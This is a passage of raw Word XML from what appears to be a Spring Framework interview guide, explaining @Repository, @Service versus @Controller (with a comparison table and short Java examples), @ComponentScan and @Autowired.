        <w:t xml:space="preserve">@Repository is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotate DAO classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and provides Spring-specific functionalities like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exception handling and bean registration</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for persistence-related logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E74FA11" w14:textId="5E3BD920"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2EA368F">
          <v:rect id="_x0000_i2548" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705528E" w14:textId="1D9E8428" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB2AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="593" w:name="_Toc196308073"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between @Service and @Controller annotation</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="593"/>
    </w:p>
    <w:p w14:paraId="1F9B5920" w14:textId="06F25968" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Difference between @Service and @Controller in Spr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4"/>
        <w:gridCol w:w="3613"/>
        <w:gridCol w:w="4026"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="0C18F925" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25B6E33D" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="743860FE" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31EDD534" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="5562E360" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351ABE55"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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E049E11"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Business/Service Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7230CE2F"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eb/Presentation Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="4FF5A932" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DB9AEEB"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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67784D6D"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ntains business logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D3F498F"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Handles HTTP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="6F362956" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E68D07D"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eturn Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3612FF69"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ypically returns data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11DD3B3C"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turns views or response bodies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="7E8D0762" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BDCBF75"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Spring Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EA99EAE"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Marks a class as a service provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C395560"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Marks a class as a web controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="3BA37E24" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03612DB2"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esponse Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4222B924"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Not directly exposed to HTTP responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49256BC0"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rocesses incoming HTTP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="37585CC3" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A2AF94F"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Special Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DAAF117"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an be used with @Transactional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11EFCB56"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orks with @RequestMapping or REST APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="1BFE669B" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53EB795C"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Annotation Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9B9412"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pecialized form of @Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8C1B40"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pecialized form of @Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09B3018F" w14:textId="77777777" w:rsidR="009F6D6F"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D7AE3A9">
          <v:rect id="_x0000_i2549" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F75BC" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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 of @Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A647C46"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C004E23"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C28435"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String getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B56C9E2"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John";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8BBAC5"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0A88DEFA"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3FDED445" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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 of @Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62821E6D"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ntroller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D620C0"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EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B347D6" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D7874E"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E7567"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    private EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349AE7DB" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BD84B7"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GetMapping("/name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4299373F"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String getName(Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE952C4"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model.addAttribute("name", employeeService.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3418EBBE"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nameView";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1896E4"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39616B84"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696673C1" w14:textId="77777777" w:rsidR="009F6D6F"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E7CAA3A">
          <v:rect id="_x0000_i2550" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7393EC"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Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE9249"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Use @Service to define business logic classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673ED448"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Use @Controller to handle web requests and route them to appropriate views or responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A82E9" w14:textId="196B0723"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84425CD">
          <v:rect id="_x0000_i2551" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE0029E" w14:textId="4FFC0665" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB2AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="594" w:name="_Toc196308074"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is @ComponentScan</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="594"/>
    </w:p>
    <w:p w14:paraId="357DA8A0" w14:textId="42E557D1" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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ComponentScan is a Spring annotation used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specify the packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scan for Spring-managed components (beans) like classes annotated with @Component, @Service, @Repository, or @Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BAD453" w14:textId="77777777" w:rsidR="009F6D6F"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39DF864">
          <v:rect id="_x0000_i2552" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A703199" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B6BF7"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Automatically detects and registers beans into the Spring </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D98ABE"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It helps in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so you don’t have to declare beans manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC74B7" w14:textId="77777777" w:rsidR="009F6D6F"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4EBB5D">
          <v:rect id="_x0000_i2553" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14065438" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D9A39C"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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25668B83"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mponentScan(basePackages = "com.example.project")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A02F362"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3FEBCB"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45458185"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is tells Spring to scan the package com.example.project and its sub-packages for annotated classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16869CB1" w14:textId="77777777" w:rsidR="009F6D6F"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76D0FB">
          <v:rect id="_x0000_i2554" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4535EFD1" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413E03A3"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pring looks for classes annotated with stereotypes (@Component, @Service, etc.) in the specified package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E4E79"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t then registers them as beans in the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB52BA8" w14:textId="77777777" w:rsidR="009F6D6F"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23BD9C5">
          <v:rect id="_x0000_i2555" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D58B29D" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Default Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC8EEB4"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If you don’t specify basePackages, Spring scans the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>current package and sub-packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class where @ComponentScan is declared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A35AD" w14:textId="77777777" w:rsidR="009F6D6F"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D1E10F6">
          <v:rect id="_x0000_i2556" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7469EFDB"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Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">@ComponentScan is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enable automatic bean detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and registration by scanning specified packages for Spring components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11942291" w14:textId="608EBC89"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CCC9C23">
          <v:rect id="_x0000_i2557" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71167C26" w14:textId="298ED37C" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="002C3B85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="595" w:name="_Toc196308075"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Autowired annotation</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="595"/>
    </w:p>
    <w:p w14:paraId="16B0ADB7" w14:textId="668BF789" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Autowired is used in Spring to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically inject dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (beans) into a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130507DF" w14:textId="77777777" w:rsidR="009F6D6F"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18DA898">
          <v:rect id="_x0000_i2558" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="430BA6F1" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110367B"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t eliminates the need for explicit bean wiring using XML or configuration methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606D8BC" w14:textId="77777777" w:rsidR="009F6D6F"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2899F78">
